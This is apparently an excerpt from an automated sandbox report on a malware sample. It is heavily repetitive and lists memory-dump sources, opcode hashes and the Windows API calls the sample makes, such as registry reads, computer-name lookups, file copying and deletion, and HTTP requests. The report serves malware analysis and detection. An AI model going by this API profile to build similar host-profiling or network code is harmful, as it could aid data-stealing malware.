                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HttpRequestSend
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 360639707-0
                                                                                                                                                                        • Opcode ID: 640d22e51ea26dd4110a4910ea00f1bfb3b3238f2ad13e7a3fa7d490065beb0a
                                                                                                                                                                        • Instruction ID: c5f7f24f37b68b0ee58fd2f50e06334a253e74aa66ac9acfdd0b5a5957e02501
                                                                                                                                                                        • Opcode Fuzzy Hash: 640d22e51ea26dd4110a4910ea00f1bfb3b3238f2ad13e7a3fa7d490065beb0a
                                                                                                                                                                        • Instruction Fuzzy Hash: 2601A470A102199FE760EF68DC84F5637B8AB8C700F01467CF715E72E2EAB09841CB15
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,00020119), ref: 004021EE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: 1736892346793bf5dfdc92e2bd7197f83a8aac4353209699b881790a5201b2bb
                                                                                                                                                                        • Instruction ID: 15967768c3bec79c77eef2f9b717003dcd37d7e4a107544feb5fa1328a83afd1
                                                                                                                                                                        • Opcode Fuzzy Hash: 1736892346793bf5dfdc92e2bd7197f83a8aac4353209699b881790a5201b2bb
                                                                                                                                                                        • Instruction Fuzzy Hash: D7F06D74200314AFD310DB26EC8AC573BBEFB9930EB024069F9018B252E6B1EC00CE60
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: 5ef6ed49f54dd764d65f4abca506ddd6ec1c4f2b24b990de35ae79443200b4aa
                                                                                                                                                                        • Instruction ID: 56b75990d9a77004b48ee4320934ccf1fffa3b3f4c17f91b25b24eb866be129b
                                                                                                                                                                        • Opcode Fuzzy Hash: 5ef6ed49f54dd764d65f4abca506ddd6ec1c4f2b24b990de35ae79443200b4aa
                                                                                                                                                                        • Instruction Fuzzy Hash: 6EF0C271A05B019B8344EF3DCEC081A77A6BBC9264F45822CE85087362EB70A985CBD6
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119), ref: 00431970
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: 406c04a0fafd960eda2531e21e8686fd5a79a1be68b108506ace148a42c4fb82
                                                                                                                                                                        • Instruction ID: 8b5cb6cb0b6a19065321153dd039a9c6641393c5d5c34dd5c1e76fe346963b1a
                                                                                                                                                                        • Opcode Fuzzy Hash: 406c04a0fafd960eda2531e21e8686fd5a79a1be68b108506ace148a42c4fb82
                                                                                                                                                                        • Instruction Fuzzy Hash: F5F0BE72A40200AFC7209F3DDC49E663BB5EBCE304F958179F8809B261EAB05820CB51
                                                                                                                                                                        APIs
                                                                                                                                                                        • getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 0041B07A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: getaddrinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 300660673-0
                                                                                                                                                                        • Opcode ID: a3ef1f1283805c717f0143fef92db67404ed982ce865052be816f7286c622970
                                                                                                                                                                        • Instruction ID: 4987b4ea97daeb264945c28c2b368119fcf171c86cdb4a3003909ff6fc10ac06
                                                                                                                                                                        • Opcode Fuzzy Hash: a3ef1f1283805c717f0143fef92db67404ed982ce865052be816f7286c622970
                                                                                                                                                                        • Instruction Fuzzy Hash: 99F06DB1904344DFDB10DF28CD80B97B7E4FB85344F01C92AE84897202E7B5A984CB51
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetComputerNameA.KERNEL32(00000000), ref: 004314B3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ComputerName
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3545744682-0
                                                                                                                                                                        • Opcode ID: 8f8eb795359fb0aa2d749ee19533a4635df463a2ca35125aa3eba5b7db898b85
                                                                                                                                                                        • Instruction ID: fbecf42e50bf32649b0f86ce1194af764c2ba67d61e8489f1122926f9e73325e
                                                                                                                                                                        • Opcode Fuzzy Hash: 8f8eb795359fb0aa2d749ee19533a4635df463a2ca35125aa3eba5b7db898b85
                                                                                                                                                                        • Instruction Fuzzy Hash: 84E06DB17021006FDB58DF2DDCD5F6B72ED9BC9254B0A4028F804D7361EA74AC10C669
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00424FA2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DeleteFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                                                        • Opcode ID: bd1a9babada568bd145aa1a14cec0041467ae98d92957aebcb34fb612b8c4628
                                                                                                                                                                        • Instruction ID: cfc07768c1fb41c6e3f6939334fee0d653a60b69caf7ad8e2d02eec98428f505
                                                                                                                                                                        • Opcode Fuzzy Hash: bd1a9babada568bd145aa1a14cec0041467ae98d92957aebcb34fb612b8c4628
                                                                                                                                                                        • Instruction Fuzzy Hash: 03F03ABA30A414EFD708CB1CDE98A58B3E5EF8930870860A8D941C7761E7F4EE51CA49
                                                                                                                                                                        APIs
                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041DEE6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1304948518-0
                                                                                                                                                                        • Opcode ID: 6b8a73052ebc37cb4aaf142216696b7bf04d85de6e58fb8cdb9bffb033e4ffbc
                                                                                                                                                                        • Instruction ID: 4d1e15c73de2ae51dea474d51b2a98e21e4986c241943f8320a136693659ef18
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b8a73052ebc37cb4aaf142216696b7bf04d85de6e58fb8cdb9bffb033e4ffbc
                                                                                                                                                                        • Instruction Fuzzy Hash: 3FF08CBAB012159FCB00CF28DC94A9A73F5FB98B00B044064E805E7364EBB0EE02CB90
                                                                                                                                                                        APIs
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,0066C978,?,0066C97E,00000000,00000000,00C00100,00000000), ref: 004161AD
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HttpOpenRequest
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1984915467-0
                                                                                                                                                                        • Opcode ID: e3d81642adf4327e69780616ad0591ef9316bdd0ab05d7b36b574a620b0e8deb
                                                                                                                                                                        • Instruction ID: 8a5e17ff852ccccc5a62063a681dbe78e7a81f8bb085fa1290191205e92529f8
                                                                                                                                                                        • Opcode Fuzzy Hash: e3d81642adf4327e69780616ad0591ef9316bdd0ab05d7b36b574a620b0e8deb
                                                                                                                                                                        • Instruction Fuzzy Hash: 4EF08C75704149AFCB00AB04ED98E13B7BBFBC8301705419CE9288B320EAB0A942EB85
                                                                                                                                                                        APIs
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,0066C978,?,0066C97E,00000000,00000000,00C00100,00000000), ref: 004161AD
